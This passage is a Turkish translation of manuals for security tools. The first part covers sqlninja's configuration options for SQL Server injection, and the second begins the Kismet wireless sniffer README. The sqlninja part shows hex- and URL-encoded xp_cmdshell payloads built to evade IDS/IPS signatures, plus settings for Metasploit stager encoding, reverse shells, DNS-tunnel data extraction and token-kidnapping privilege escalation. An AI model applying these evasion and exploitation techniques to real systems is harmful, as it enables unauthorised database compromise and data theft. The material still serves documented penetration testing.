gönderdiğiniz HTTP isteği değişmeden kullanılır
(eklenecek kodun ön ve arkasında bulunan işaretlerin
bulunduğu yerler bu sözün dışındadır). Bu aynı
zamanda sqlninja'nın sizin dil bilgisi olarak
yazdıklarınızı da düzeltmeyeceği anlamına gelir. O
zaman göndereceğiniz HTTP isteğinin doğru
olduğundan emin olmalısınız (tüm URL kodlamaları
dahil). Daha çok bilgi için RFC 1945, RFC 2068 ve RFC
2616 belgelerine bakabilirsiniz.
Eklenen sorgulamadan sonra bile başka SQL kodu
eklemek isteyebilirsiniz (yani işaretten sonra).
Genelde buna gerek olmaz. Sqlninja iki “--” işareti ve
açıklamaları asıl sorgulamanın dışına taşır. Ama bazı
ender durumlarda ek SQL kod eklemek isteyebilirsiniz.
Batch sorguların doğru çalışabilmesi için ayarlarda
“appendcomment = no” yazmayı unutmayın. O
zaman SQL komutlarınız eklenen “--” yüzünden
açıklama gibi yorumlanır.
Bir cookie (çerez) içinde ekleme yapıyorsanız ve asıl
sorgulamayı kapatmak için noktalı virgül gerekiyorsa
%3B ile kodlanmış olarak yazın. Yoksa cookie'nin sonu
olarak nitelendirilir.
Her satırın başında boşluk bırakmayın.
Açıklama satırlarını bırakmayın, onlar isteğin bir
parçası olarak değerlendirilir ve taranır.
Son olarak sqlninja'nın bağlanacağı kapıyı
belirtmezseniz program HTTP için 80, HTTPS için 443
varsayılanını kullanır.

proxyhost
Hedef sunucuya HTTP proxy üzerinden bağlanılır. Örneği
gerektiğinde
proxyhost = 192.168.1.233
yazılır.
proxyport
domain
msfpath
Bizim bağlandığımız HTTP proxy kapıyı varsayılan olarak
8080 olur. Örneğin “proxyport = 3128” yazılabilir.
Saldırgan yöre ya da alt yöreyi denetler. Bunları dns tünel
konumuyla kullanır. Sqlninja'nın başlatıldığı IP adresinden o
yöre için kullanılan DNS sunucusu tanımlanır. Örneğin
“domain = sqlninja.net”
Metasploit programları (msfpayload ve msfcli) için mutlak
yol tanımlanır. Örneğin “msfpath =
/home/icesurfer/tools/framework-3.1”
kaçma (evasion)
Sqlninja imza tabanlı IPS/IDS atlatmak ya da karıştırmak için
bir kaç kaçma tekniği kullanabilir . Şu anda dört teknik
programa uyarlanmıştır.
1 Sorgulamanın onaltı tabanına göre kodlaması.
Sorgulama çalıştırılmadan önce onaltılı tabana göre
kodlanır.
2 ayıraçlar olarak açıklamalar. Tüm boşluklar /**/ ile
değiştirilmiştir.
3 Rastgele olaylar
4 Rastgele URI kodlaması

İlk teknik özellikle kullanışlıdır. Örneğin eğer biz aşağıdaki
komutu eklemek istersek:
exec master..xp_cmdshell 'cmd /C ğing 127.0.0.1'
Asıl sorgulama aşağıdaki gibi olur:
declare @a varchar(8000) set
@a=0x65786563206d61737465722e2e78705f636d6
47368656c6c2027636d64202f432070696e67203132
372e302e302e31273b exec (@a)
Daha uzun bir dizidir ama aşağıdakine dikkat edin:
xp_cmdshell arayan IPS'lere güle güle deriz. SQL
komutları yok DECLARE ve EXEC var sadece...
Tek tırnak da yok. Bu kaçma tekniği çok açık bir
biçimde kullanışlıdır.
Aşağıdakiyle tüm teknikleri birleştirebilirsiniz:
evasion = 1234
Bu bayağı şifrelenmiş bir kod üretebilir:
%64ECl%41RE%2F%2A%2A%2F%40%61%2F%2A
%2A%2F%76Ar%63%48aR%288000%29%2F%2A%2A
%2F%73 ET%2F%2A%2A%2F%40A%3D
%30%586%35786%3563%3206d617%33746%35%37
2%32e2%457870%35F63
6d647368%36%35%36%63%36c2%302%37636D
%3642%30%32f
%34320%37%3069%36%65%36720%331% 332372E
%330%32E3%30%32%45%3312%373b%2F%2A%2A
%2FeX%65%43%2F%2A%2A%2F%28%40A%29
sqlninja varsayılan olarak evasion değerini sıfır yapar ve
kaçma tekniklerinden hiçbiri kullanılmaz.

Önemli
Msfencoder
Eğer GET isteği kullanıyorsanız gereksiz örtünmeyin.
O zaman çok uzun URL olacak ve web sunucu
tarafından doğru taranamayacaktır (parse).
Metasploit adımlayıcı olarak kullanılan bir kodlama biçimidir.
Eğer belirtilmezse kodlama yapılmaz. Ama iyi bir kodlayıcı
her zaman önerilir.
Msfencoder = x86/shikata_ga_nat
Yükleme yöntemi (upload)
İkili program dosyalarını yüklemek için kullanılır. Olası
değerleri “debug” ya da “vbscript” (varsayılan) olabilir.
Örneğin:
upload_method = vbscript
Veri çekme/alma Seçenekleri
Veri kanalı (data_channel)
Bu kanal veri çekme/alam amacıyla kullanılır. Zaman (time)
olabilir (ki varsayılandır), WAITFOR tabanlı çekme kanalı olabilir
(çok yavaş ama her zaman çalışır) ya da “dns” (daha hızlıdır.
Halka açık IP numaranızı çözebilmesi için yöre ve alt yöre
kontrolü olabilmelidir).
Veri çekme/alma (data_extraction)
Zaman tabanlı çekmeden konu açılınca üç olası yöntem vardır.
Eğer ikili (binary) seçilirse, sqlninja ikili tarama yaoar böylece
isteklerin sayısını azaltır. Eğer ardışık (serial) seçilmişse, sqlninja
tüm olası değerleri dener (daha hızlı olabilir çünkü WAITFOR bir
kez tetiklenecektir) ama karşı sistemin kayıtlarında daha fazla
bilgi bırakır. Eğer sıralı en iyilenmiş (serial_optimized) kullanılırsa
sqlninja en olası olanlardan başlayarak tüm olası değerleri dener.
Varsayılan serial_optimized olarak tanımlanmıştır.

Dil Haritası (language_map)
Eğer zaman tabanlı bilgi çekmeyi kullanıyorsanız ve çekme
yöntemi olarak sıralı en iyileşmiş seçilmişse, dil haritası
tanımlayıp karakterlerin sıralanmasını düzenleyebilirsiniz. Hatta
bazı önceden tanımlanmış haritaları lib/langs altından bulup
kullanabilirsiniz. Bu haritalar dildeki harf, boşluk ve bazı
noktalama işaretlerinin kullanım yoğunluğuna göre
düzenlenmiştir. Eğer kendinize göre bir harita istiyorsanız harfleri
ve işaretleri sırayla dizin. Tüm olası karakterleri tanımlamanız
gerekmez.
language_map = lib/langs/en.maps
Evlatlık alınan dil haritası (language_map_adaptive)
Sıralı en iyileştirilmiş bilgi çekme kullanıldığında, sqlninja evlatlık
alma yaklaşımı kullanır. Aslında dil haritasındaki her harfe bir
ağırlık puanı verilir ve her seferinde bir karakter başarılı biçimde
çekildiğinde ağırlık puanı 1 arttırılır. Ninci pozisyondaki
karakterin ağırlık puanı N-1 dekinden yüksekse, haritada yerleri
değiştirilir. Böylece ağırlık puanı daha yüksek olan karakter (o
halde daha sık kullanılıyordur) O zaman denemede ilk
kullanılacak olandır. Burada değerler ya evet ya da hayırdır. Ama
daha iyi sonuç almak için her zaman evet olanda kalmalısınız.
language_map_adaptive = yes
saklama oturumu (store_session)
Varsayılan olarak sqlninja tüm çekilen veriyi SQLite veri
tabanında saklar. Bu size çekilen verinin yerel ortamda
saklanmasını sağlar. SQLite veri tabanına komut satırından
erişilir (varsayılan adı session.db).
store_session = yes

akıl denetimi (sanity_check)
Zaman tabanlı veri çekerken, ağ gecikmesi çekilen verini
doğruluğunu engelleyebilir. Eğer sqlninja çekilen verinin
doğruluğunu (şu anda DB, kullanıcılar, tablolar ve kolonlar ama
veriler henüz değil) saptayamazsa aynı bilgi yeniden çekilir.
Kontrol sonunda çekilen tüm veri için yalnız bir sorgulamayı
içerir (örneğin kolon adı gibi). Bir WAITFOR kullanılır. Bu bir kez
çalıştırılır ve eğer bilgi doğru değilse. O halde denetimin çok
sınırlı verim çakışması vardır. Genelde bu da “yes” olarak
kalmalıdır.
sanity_check = tes
Gelişmiş Seçenekler
lhost
Hedfin ters bağlantıda bağlanması gereken IP numarası. Yani
sizin IP numaranız.
Lhost = tester.sqlninja.net
device
Ters taramada paketleri koklamak için (sniffing) kullanılacak
cihazdır.
Device = ppp0
filter
ters tarama konumunda geçerli pcap deyimidir. Varsayılan
olarak bu saldırıyı yaparken sqlninja karşı sistemden gelen
paketleri inceler. Ve lhost ile belirtilen sunucuya yönlendirir. Her
koşulda çalışmaya bilir. Veri tabanının çıkışları bir IP numarasına
kapatılmış olabilir. O zaman bizim varsayılan pcap elemesini
geçmemiz gerekir. Örneğin hedefin altkümesindeki tüm
bilgisayarları işleme dahil edebilirsiniz. Burada sunucuları ve
ağları tanımlarsınız
filter = src host nat.victim.com

Zaman aşımı (timeout)
Bu parametre ters tarama konumunda kullanılır. Diğer paketleri
göndermeden önce web servis bitince kaç saniye beklenmesi
gerektiğini söyler (varsayılanı 5 saniyedir). Bu özellikle çok
geniş kapı taraması yapılırken önemli olabilir. Çünkü web isteği
netcat süresi dolmadan zaman aşımına girebilir. O zaman
aşağıdaki değeri çoğaltmanız gerekebilir:
timeout = 30
Sunucu adı boyu (hostnamelength)
FQDN uzunluğu dns tünel konumunda hedefin çözümlemeye
çalışacağı yalancı sunucu adının en uzun boyudur. RFC'ler göre
255 limittir. Fakat bence bir çok DNS sunucu 253'den buyuk ad
kabul etmemektedir.
Hostnamelength = 250
Eğer çok uzun DNS adları hemen saptanır derseniz boyu
küçültmek gerekebilir. Tabi ki kısa dns adı yavaş iletişim hızı
demektir.
msfencodecount
Adımlayıcının kaç kez kodlanacağını söyler.
Msfencodecount = 8
usechurrasco
token kaçırmada yetkileri arttırmak için kullanılır. Örneğin:
userchurrasco = yes

esolvedip
Dns tünel konumunda her DNS istemine gönderilen IP adresidir
(gethostbyname() asılmasın diye). Genelde bunu 127.0.0.1
değerine atamak (varsayılandır) en iyisidir. Karşı veri tabanı
sunucusu yalancı sunucu adıyla ağ trafiğini karıştırmadan
varsayılanı kullanmaktır.
xp_name
Komutlarımızı çalıştıran işlemin adıdır. Varsayılanı xp_cmdshell.
Bu parametre iki biçimde kullanılır:
resurrectxp:
xp-name yaratılacak dış işlemin adını taşır Eğer
xp_cmdshell'i yeniden etkinleştirmek olduğuna inanırsanız
yakalanabilir. Bu nedenle burada başka bir ad
kullanabilirsiniz.
Dış işlem adı kullanan tüm diğer konumlar
resurrectxp konumunda kullanılanla aynı olamayan bir ad
olmalıdır.
zp_name NULL olabilir. O zaman komut içi işlem ekleme
kullanılır. Örneğin:
xp_name = sp_sqlbackup
kör zaman (blindtime)
Arayüzü tabanlı eklemelerde parmaka izi ve kaba kuvvet
konumlarında kullanılan WAITFOR DELAY çağrılarının değeridir.
Varsayılan değer 5 saniyedir. Ama çok yavaş sunucular için az
olabilir ve hatalı sonuçlara götürebilir. Eğer böyle şeyler olursa
süresi yükseltmeye çalışın. Eğer sunucu yanıt zamanı çok
kısaysa daha küçük bir değer tanımlayabilirsiniz. En küçük değer
3 saniye olabilir. Örneğin
blindtime = 4

Her isteğin satır sayısı (lines_per_request)
Bu parametreyle bir istekte kaç satır onarım programı
yükleneceğini kontrol edersiniz. Yüksek bir değer tabi ki hızlı
yükleme demektir. Ama GET isteği kullanılıyorsa URL çok uzun
olacağından riskli olabilir. Varsayılan değer 10 olur. En çok 30
olabilir. Örnek:
lines_per_request = 15
Hata dizisi (error_string)
Sqlninja HTTP hata kodu alındığında kullanıcıyı uyarır (örneğin
500 Sunucu Hatası gibi). Bazı sayfalar 200 OK gibi bir yanıt
döndürür. Bu gibi durumlarda sqlninja'ya hatanın içinde bulunan
bir hata dizisi tanımı vermek akıllı olur. Örneğin
error_string = “an error has occured”
Açıklamayı ekle (appendcomment)
Varsayılan olarak sqlninja SQL kodundaki fazlalık olan kodları
açıklamaya çevirmek için sorgulamaya iki eksi işareti ekler
Örneğin
appencomment = yes
Bu ayarı ancak ne yapmak istediğinizi biliyorsanız kullanın.
checkdep
Metasploit'in şu anki sürümünde adımlamada DLL eklemeden
DEP otomatik kapalıdır. Ama bu bir nedenden çalışmazsa, eski
davranışa geri dönebilirsiniz. Sqlninja karşı sistemin DEP
ayarındaki değere bakar ve Metasploit adımlayıcısını (stager)
beyaz listeye sokmak için xp_regread programını çalıştırır.
Varsayılan olarak bu değer başlangıçta hayır olarak kullanılmıştır.
checkdep = no

sqlmarker
sqlninja'ya var olan işaret değişikliğini bu parametreyle
bildirirsiniz. Varsayılan kod ekleme işareti __SQL2INJECT__ dir.
Bunu değiştirmenize hiç gerek yoktur ama diyelim ki
değiştirdiniz, örnek yazım:
sqlmarker = SOME_WEIRD_STRING_HERE
b64decoder
base64 biçiminde kodlanmış dosyaları çözecek programın adını
değiştirmek istediğinizde bu parametreyle sqlninja'ya aşağıdaki
örneğe benzer bir tanımlama yaparsınız. Aslında varsayılan
değer b64decoder.vbs programıdır.
b64decoder = somename.vbs
Diğer Yararlı Bilgiler
Sqlninja GPLv3 (General Public License V3) lisansı ile dağıtılır. Ayrıntılar için
LICENSE dosyasına bakın.
Netcat sqlninja paketi içinde scr kalıbındadır.
Ayrıntılı yazdırma konumunda “Bareword NetPaket IP IP_PROTO_UDP
not allowed blah blah” hatası alabilirsiniz. Hiç sorun çıkartmadan hatalı
atlayabilirsiniz. Aslında NetPacket'in zararsız bir hatasıdır. Bu hatadan
kurtulmak isterseniz de UDP.pm içindeki “$proto=17” değişikliğini
yapın.
Arka plan konumunda bulunan tüm belgeler Next Generation Security
firmasına aittir (NCC Grubun bir parçasıdır http://www.nccgroup.com/).
Yeni başlayan değilseniz piste snowboard yapmak sakattır.

Krediler
Sqlninja size yardım olmuş olabilir. Ya ağa sızıntıları saptamada
kullandığınız için ya da uygunsuz bir biçimde e-ticaret sitelerinden
çaldığınız kredi kart bilgileriyle milyoner olduğunuz için. O zaman
aşağıdakilere teşekkür etmeniz gerekecektir:
julie – DNS tünellemesi konusundaki tartışmaları için
Davide Litchfield ve Chris Anley – Arka plan işleri bölümünde
listelenen yazı ve dökümanlar için
lele – SQL büyüsü için
pentestmonkey.net – Daha çok SQL büyüsü için
sp0nge – tüm tartışmalar ve kodlama ip uçları için
hobbit – tabi ki netcat için
The Metasploit geliştirme takımı – ürünleri için
Cesar Cerrudo – token kaçırma saldırısı için
Antonin Foller – değiştirilmiş xp_cmdshell kodu için
Nmonkey – Bir sürü ip uçları, oyunlar ve geri besleme ve bobcat
takımından adam çalmama izin verdiği için
Tavis Ormandy – Asıl KiTrap0d çıkarcılığı için
Birillo ve cima-asso.it – sqlninja'yı 6130metre yukarıdaki Ladakh
dağlarına çıkarttıkları için
The Spike Riders Team – snowpark'ta görüşelim ahbap!
Ek krediler s4tan'a, Stefano Di Paola, Elhot Kendall, geese, Phlippe
Schaeffer, Angelo Dell'Aera, WarGame, jussi, bambam, Ross Bushby,
Konrad, Malewski, Hubert Seiwert, Raul Siles ve #uncon'dan bir kişi ye
gidecek (düşünce|öneriler|yamalar|destek|alkol) için
Sorumluluğu Kabul Etmeme
Sqlninja kurulumu programlarla oynayan çocukların işine yaramaz.
Ayrıca bu araçla ne yapacağınız tümüyle sizin sorumluluğunuzdadır.
Bu ürünü kullanabilmek için yazılı bir belgeniz olması gerekmektedir.
Böylece incelediğiniz ağ içinde güvenlik delikleri oluşturabilirsiniz. Bu
tür yetkiniz yoksa yazılımı rast gele kullanmayın. Eğlence olsun diye
kullanabilirsiniz kuşkusuz ama unutmayın ki çevrenizdeki bunca yasal
engelle uğraşacak olan da sizsiniz. Bu konuda yardımımız olamaz.
Geri Besleme
Eğer görüşleriniz, düşünceleriniz ve yapılabilecek gözlemleriniz varsa
ya da yeni işlevselliklerden söz ediyorsanız, bir hata bildiriyorsanız,
bize bir satır yazı yazın. Sızma testlerinde bu aracı başarıyla
kullanmışsanız, hacking komitesinin bazı faturaları ödeme ve bazı
şeyler alma gibi gereksinimleri de vardır. Bize bağış yapabilirsiniz.

Akıllılık
Her aptal bir iş için yalvarır durur, akıllı adam onu çalışmadan elde
eder. Charles Bukowski.
Yazarlar
icesurfer -
nico -

İÇİNDEKİLER
1. Kismet nedir
Ek-3
Kismet 2011-01-R1
Mike Kershaw
http://www.kismetwireless.net
2. Eski sürümlerden güncelleme
3. Hızlı Başlangıç
4. “root” yetkisi (Suidroot) ve güvenlik
5. Kaynakları yakalama
6. Özel sürücüler için Caveats & quirks
7. Desteklenen kaynak yakalama
8. Eklenebilir program parçaları
9. GPS
10. Kayıt altına alma (Logging)
11. Filitreleme
12. IDS ve Uyarılar
13. Sunucu Ayar Seçenekleri
14. Kismet Kullanıcı Arayüzü
15. Kismet drones
16. Kismet'le konuşma
1. Kismet Nedir
Kismet 802.11 kablosuz ağ saptayıcısı, trafik koklayıcısı, ve sızıntı yakalama
sistemidir. Ham izleme konumunu destekleyen her tür kablosuz ağ kartıyla
çalışır ve 802.11b, 802.11a, 802.11g ve 802.11n trafiğini koklayabilir.
Kismet eklenebilir programları destekleyerek 802.11 dışındaki protokolleri
de analiz edebilir, kodlarını açabilir.
Kismet pasif olarak ağların paketlerini toplar ve onlardan tanımlanmasına
izin verenleri tanımlayabilir (ve gizli ağların adlarını açıklayabilir). İşaretsiz
ağları veri trafiğinden çıkarabilir.
2a. Eski sürümlerden güncelleme
Bazı temel özellikler çoklu sanal erişim noktasında (multi-vap) becerisi olan
cihazları (kernel içinde tanımlanan linux cihazları gibi) yeni sürümde
değişmiştir. Uygun olduğu her an eski arayüzü değiştirmek yerine yeni VAP
(virtual access point) yaratır ve ayarlar. Eskisini korumak için
“forcevap=false” seçeneğini kullanın (kaynak satırında).

2b. Kismet'İn Eski sürümlerinden güncelleme
Bu sürüm Kismet'in çalışması ve ayarları konusunda MAJOR (Ana)
değişiklikleri işaretler. Aslında bir çok konu aynıdır. Bir çoğu da (istemciler,
ayar kaynakları ve kanallar gibi) farklıdır.
Yeni özelliklerin yararlarından faydalanmak için var olan ayarlar dosyanızı
son ayar verileriyle değiştiriniz.
En önemlileri
Kaynaklar farklı tanımladı. “Kaynak yakalama” bölümüne bakın
Tüm Kullanıcı Arayüzü ayarları Kismet istemci içinde ele alındı ve
kullanıcının evinde ~/kismet/k,smet_ui.conf dosyasında tanımlandı
Daha önce hata olan ve Kismet'in işini bitirmesine neden olan pek çok
durum artık çözümlendi
Yeni eleme seçenekleri eklendi
Yeni uyarı seçenekleri eklendi.
Tümüyle yeni kullanıcı arayüzü oluşturuldu.
Ağ erişim protokolü yüz değiştirdi.
Yüksek sayıdan ağ için daha az CPU kullanılır oldu.
Eklenebilir program parçaları (plugin) kullanılmaya başlandı.
Bu sürüm daha önceki sürümlerden her şeyi kırıyor olsa da daha kolay üst
sürüme geçiş kapısını açmaktadır.
3. Hızlı Başlangıç
Kismet'i çalıştırmadan tüm el kitabını okuyun. Burada Kismeti çalıştırmak
için gereken en azlara yer verilmiştir.
http://www.kismetwireless.net/download.shtml adresinden kismet'i
indirin
“./configure” programını çalıştırın. Çıktıları kontrol edin. Eğer Kismet
her şeyi bulamazsa en önemli özellikleri eksik kalabilir. En önemlisi
Kismet'i derleyin.
İstediğiniz tüm özelliklerin açılmış olduğunu ayarlar dosyasından
kontrol edin. Doğru çalışma için hemen her kullanıcı pcap ve libnl
desteğine gerek duyar.

Kismeti “make” ile derleyin
“make install” ile kismeti kurun.
Eğer Kismeti suid-root olarak kurduysanız kullanıcınızı “kismet”
grubuna ekleyin.
Kismeti “kismet” diye çalıştırın. Eğer suid-root desteğiyle
kurmadıysanız hemen her koşulda “root” olarak başlatmanız gerekir.
Bu pek önerilmez çünkü daha az güvenlidir.
Kismet sunucusunun başlaması için soru geldiğinde “yes” yazın.
Yakalanacak arayüz sorusu geldiğinde kendi kablosuz arayüzünüzü
girin. Kismet hemen her durumda desteklenen kanallardaki cihaz tipini
otomatik belirler. Eğer belirleyemezse bunu sizin elinizle tanımlamanız
gerekir.
Kismet'i başlattığınız yerde kayıtlar (log) saklanır. “logprefix” ayarı ile
yerini değiştirebilirsiniz. Ya da başlama satırında -logprefix ile yol
belirtebilirsiniz.
README'nin kalanını da okursanız Kismet hakkında bir çok özelliği ve
ayar bilgisini öğrenebilirsiniz. Ne kadar çok okursanız o kadar çok
bilginiz olur.
3b. Windows hızlı başlangıç
Bu yazının hazırlandığı zamanda “CACE install” güncellemesi henüz
yapılmamıştı. Bu nedenle yeni çekirdek kodun faydalarını kullanacaklar
Kismet'i Cygwin kullanarak kendileri derlemeliler.
CACE Paketini kullanarak
Önce Win32/Cygwin installer indir.
(http://www.kismetwireless.net/download.shtml
Installer'ı çalıştır
Kismet'i başlat
Kendi Airpcap ya da Kismet Drone kaynaklarını seç.
Kendiniz derlediğinde
Cygwin kurulumunu indir( http://www.cygwin.org)
Cygwin kuruluşu yap (make gcc, libncurses, libncurses-dev ile)
CaCE destekten Airpcap Devpack indir
Airpcap, DevPack ve Libcap_Devpack bilgilerini kismet kaynak yoluna
tasi

./configure –with-airpcap-devpack=... --witn-winpcap-devpack=...
--enable-airpcap çalıştır. Eksik programları CACE websitesinden
sağlayabilirsiniz. Cygwin hatalarından airpcap ve winpcap kismet yolu
altında olmalıdır.
“make” ile kismet'i derleyin
“make nstall” ile kuruluşunu tamamlayın.
Not: KISMET yalnız CACE AIRPCAP DEVICE ile çalışır.
3c. OSX/Darwin hızlı başlangıç
Bir çok kişi iTerm anahtar olayları doğru göndermiyor diye söyleniyor. Ama
Terminal uygulaması doğru çalışıyor gibi görünüyor ve Kismet'le çalışması
uyumludur.
http://www.kismetwireless.net/download.shtml adresinden Kismet'i indirin
“./configure” çalıştırın ve çıktıya dikkatle bakın. Belki libpcap yoktur elle
yüklemeniz gerekebilir.
OSX içindeki libpcap PPI kayıtına olanak tanımaz. Kismet PPI kayıtını doğru
yapamayabilir (802.11 kayıtlarını yazarken her pakette yer alan başlıkları
yazılmayabilir)
configure prıogramı OSX'i otomatik olarak belirler ve “staff” grubuna
varsayılan olarak “suidinstall” yapılabilir. Bunu “--with-suidgroup” ayar
seçeneği ile değiştirebilirsiniz.
“make” ile Kismet'i derle.
“make install” ile kismet'i kur. Ya da make suidinstall” ile kuruluş yap.
Eğer Kismet'i suidinstall ,le kurduysanız kullanıcınızı “staff” grubuna
ekelmelisiniz.
Eğer suidinstall kullanılmadıysa “kismet” root yetkileriyle çalışırtırılır. Yoksa
kendi kullanıcınızla çalıştırabilirsiniz.
Kismet sunucusu çalışmaya başladığında ilk soruya “yes” diye yanıt verin.
Yakalanacak arayüz sorulduğunda kablosuz bağlantının arayüzünü girin.
Kısmet otomatik olarak cihaz tipini ve desteklenen kanalları belirler. Eğer
yapamazsa elle yakalama tipini girmelisiniz.
Birçok mac için bu 'en1' olur. Ama bir terminal başlatıp “ifconfig -a” ile ne
olduğuna bakın.

Kablosuz ağ arayüzü daha önce etkin hale getirilmiş olmalıdır. O zaman
kismet çalışabilir. Yoksa hiçbir ağı bulamaz.
Kismet şu anda yalnız Airport kablosuz cihazlarıyla çalışır (USB'lerle değil).
Log kayıtları Kismeti başlattığınız dosya yolunda saklanır. Ama “logprefix”
ayarı ile ya da “-log-prefix komut satısı parametresiyle değiştirebilirsiniz.
4. “root” yetkisi (Suidroot) ve güvenlik
İzleme konumunda kablosuz bağlantı kartını ayarlarken paketleri
yakalamaya başlayınca Kismet root yetkisi ister. Bunu sağlamanın iki yolu
vardır. Ya Kismet root olarak başlatılır ya da kurulurken öyle ayarlayın ki
kotrol parçaları çalışırken root yetkisi kullansın.
Kismet'i root olarak başlatmanın anlamı Kismet root olarak çalışmaya devam
eder. Kuramda bunun ek bir sorunu olmaz. Ama herhangi bir anda kırılma
olur program çalışmazsa (ya da bir paketteki kod root konumunda çalışmaya
kalkabilir). Ek olarak üçüncü partilerin yazılımları root olarak çalışabilir ve
güvenli de olmayabilir.
Kismeti suid-root olarak kurmanın yaratacağı sınırlamalar vardır. İkili alamda
(bnary) kistem_captur “kismet” grubundakilerce başlatılabilir. Bu
ayarlamayla kanallar kontrol edilirmı yalnız kullanıcı düzeyinde yapılabilr.
Böylece saldırı yüzeyinde belirgin bir limitleme getirilmiş olur.
Dağılımlar önemle bu konumun kullanılmasını istemektedirler, çünkü
standart grup kontrollarına izin vermektedir. Kismet bunu kartın konumunu
değiştirmede kullanmaktadır.
Gömülü sistemler tipik olarak daha az saklama alanı ve bellek ve bu
sınırlamalardan dolayı kullanıcı/root ayrımını çoğu zaman zorlamazlar.
Gömülü sistemlerde kismet kismet_capture programı olmadan kurulabilir ve
yalnız root olarak çalıştırılabilir ama hala yukarıdaki risk devam eder.
Hiç bir koşulda kismet_server programı suid-root olarak tanımlanmamalıdır.
Çünkü bu program tüm güvenlik kontrollarını geçirir.
5. Kaynakları yakalama
Kismet içindeki paketlerin hepsi kaynak yakalamadan gelir. Kaynak
yakamala yerel sistemdeki tipik ağ kartıdır. Ama daha önce kaydetilmiş bir
dosya da olabilir. Ya da uzaktaki bir Kismet asalağının (drone) çalıştığı bir
sistem olabilir.
Kismet bir çok koşulda kaynak yakalama işinde sürücüyü ve desteklenen
kanalları kendisi otomatik belirler. Bir çok kullanıcı için bu yeterlidir. Ama
kaynak yakalama için gelişmiş seçenekler de vardır.

Kismet paketleri 802.11 katmanında yakalar. Bunun için ağ arayüzünün
konumunun değişmesi gerekir. Bu değişiklik sonrasında arayüz artık normal
kullanım için çalışamaz. Zaten bir çok durumda aynı arayüz üzerinden
Kismet çalışırken kablosuz ağa bağlı kalınamaz. Kaynak yakalama Kismet
Kullanıcı Arayüzündeki “Kaynak Ekle” seçeneği ile eklenir. Virgülle ayrılan
seçenekler “Options” alanına eklenebilir. Kismet.conf dosyasında da
“ncsource=” seçeneği ile tanımlanmış olabilir. Örneğin:
ncsource=wlan0 option1=bar
Kaynak Seçenekleri:
name=foo
Kaynak için kullanıcıya özel bir ad (aksi halde yakalanan arayüz
ile adlandırılır). Bu tümüyle keyfi ve yalnız kullanıcı için
anlamlıdır.
type=foo
Otomatik yakalanamayan kaynaklar için tipi burada belirtilir. Bu
çok seyrek gereken bir durumdur. Kaynak tipleri hakkındaki
diğer bilgiler bunu izler.
uuid=foo
Tek ve değişmez bir arayüz kullanmak isteyenler onu burada
tanımlayabilirler. Bir çok kullanıcı için gerekmeyebilir. UUID
kalıbıXXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX biçimindedir.
hop=true|false
Kanal sekmelerini kaldırma. Varsayılan kaynaklar için kanallarda
sekmedir. Böylece tüm spektrum kapsanabilir.
velocity=#
Kanallarda sekme hızı (saniyede gezilecek kanal sayısı). Kismet
bi saniyede 1-10 kanal gezebilir.
dwell=#
Kanalda kalma süresi Kismetin bir kanalda kalacağı süreyi
tanımlar. Eğer sekme açıksa ve kanalda kalma süresi de
belirtilmişse Kismet her kanalda N saniye kalır. Bir saniyede N
kanal gezmek yerine...
channellist=ad
Bu arayüzde otomatik bulunan kanallar listesi yerine başka bir
kanal listesi kullan. Burada kanal listesinin tanımlı olması gerekir.
split=true|false
Birden çok kaynak aynı kanal listesini kullandığında (otomatik
bulunan ya da channellist=seçenek biçiminde tanımlanan).

Kismet onları parçalara ayırır. Öyle ki aynı anda birden çok
kaynak aynı kanalla ilgilenmemiş olur. Kaynaklar bunu dikkati
almamaya göre zorlanır ve kanal listesinin başından sekmelere
başlarlar. Çakışmalar dikkate alınmaz.
retry=true|false
Kismet kaynak yakalamayı yeniden açmak ister ve hata alır.
Eğer kullanıcı kaynağın kapalı kalmasını isterse bu özellik
kapatılabilir.
vap=arayüz
Var olan arayüzün konumu değişileceğine ikincil olarak
adlandırılmış arayüz yaratılır. Bu aslında Linux altındaki
mac802.11 sürücüleri içindir. Kismet+Managed ya da
Kismet+injection kullanmak isteyenler vap yaratır.
forcevap=t|f true|false
izlenebir konumda VAP yaratmaya zorlanılır (tüm Linux
mac802.11 sürücüleri bunu destekler). Varsayılan “true” olup
VAP adı arayüzün sonuna mon eklenerek elde edilir. Örneğin
wlan0 için wlan0mon. “wlan1mon” ve yakalama buradaki VAP ile
yapılır. Bu özellik zorla kapatılabilir (forcevap=false seçeneği ile)
wpa_scan=time
mac802.11 VAP kullanırken, Kismet yönetilen arayüzde
tetiklemek için donanım yardımlı taramalarda wpa_supplicant
kullanabilir. Böylece görüş yelpazesi ve yönetilen VAP
işlemlerinin yapısı bozulmadan izleme yapılabilir. Tarama
aralıkları için süre 15 saniyedir.
Validatefcs=t|f true|false
Kismet normalde gelen paketlerin FCS toplam kontroluna dikkat
etmez. Çünkü birçok sürücü ilk anda hep doğru paketler
gönderir. Paket kaynakları geçersiz parçaları varsayılan olarak
bildirseler bile bu seçeneği otomatik olarak başlatırlar.
Eğer sürücüler doğru olmayan paketleri var diye bildirilip elle
ayarlanıyorsa, bu seçenekle Kismet'e kırılmış ve bozuk
paketlerin dikkate alınmaması gerektiği bildirilir.
fcs=true|false
Paket kaynaklarındaki FCS bayt'larının ele alınmasını zorlama
seçeneğidir. Varsayılan “false”, yerel FCS ele alınma koşulu
olarak tanımlanır. Paket kaynakları radiotap ya da PPI gibi her
paketteki başlıklar paket kaynaklarında dikkate alınmaz. Ama
paket kaynakları pcapfile, 802.11 ham veri okumaları daha
doğru davranışlar için bunun ayarlanmasını gerektirebilir.

fcsfail=true
Bilinen kötü FCS (paket kontrol toplamı) olan paketler için
mac802.11 VAP zorunlu bilgilendirilir. Bu seçenek “vap=”
seçeneğinden sonra gelmelidir. Yoksa dikkate alınmaz. “fcsfail”
açılması otomatik olarak “validatefcs” açılmasını beraberinde
getirir. “fcsfail” seçeneği yalnız PPI kayıt edilirken açılmalıdır.
Normalde PCAP kayıtları için FCS verilerine bakılmaz ve zaten
okunmayacak çıktı oluşur.
UYARI: Bazı sürücü sürümleri için bunu açmak ve yakalamayı
durdurup başlatmak söz konusu olursa, kernel'da OOPS
uyarılarına neden olmakta ve arayüz yanıt vermez duruma
gelmektedir. Bu seçenek yetkin insanların kullanımı içindir.
Bilginiz yetersizse, bırakın varsayılan değer kalsın.
picpfail=true
PLCP kontrolünü geçemeyen paketleri (eğer o arayüzde olası ise)
mac802.11 VAP'ye zorla bildir. “fcsfail” için yapılan aynı uyar ve
koşullar burası için de geçerlidir. Bu seçenek özel ve yetkin
kullanıcılar içindir.
Örnek kaynaklar (bunlar config dosyası parametreleridir. Ama komut
